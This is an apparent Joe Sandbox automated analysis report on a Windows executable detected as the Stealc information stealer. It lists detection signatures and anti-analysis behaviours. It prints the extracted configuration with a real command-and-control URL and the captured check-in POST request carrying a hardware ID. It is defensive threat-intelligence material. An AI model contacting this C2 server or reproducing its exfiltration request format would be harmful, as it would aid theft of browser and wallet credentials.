Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561486
MD5:0537afac70b6fbc5a47749caf7565b78
SHA1:8ec7e7c48823c50e4c4ee6b6cd5c007ef964cad8
SHA256:cc1ee7d61921fed5338f55fc6e9a0661cb78fb562e54280aec23be3adca5e73a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0537AFAC70B6FBC5A47749CAF7565B78)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7404JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7404JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T14:47:16.566594+010020442431Malware Command and Control Activity Detected192.168.2.749702185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php?=Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpS=Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php_=Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpK=Avira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7404.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_009B4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_009D40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_009B60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_009C6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_009BEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_009B9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_009B9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_009C6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_009B7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009C18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009CE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_009C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009C4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_009CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009B16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009B16A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 33 37 43 32 35 30 44 34 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="hwid"6137C250D41F1622379703------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="build"mars------BKEHDGDGHCBGCAKFIIIE--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_009B4C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 33 37 43 32 35 30 44 34 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="hwid"6137C250D41F1622379703------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="build"mars------BKEHDGDGHCBGCAKFIIIE--
              Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/B
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?=
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK=
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS=
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_=
              Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phps
              Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/q
              Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206qM
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_009B9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D48B00_2_009D48B0
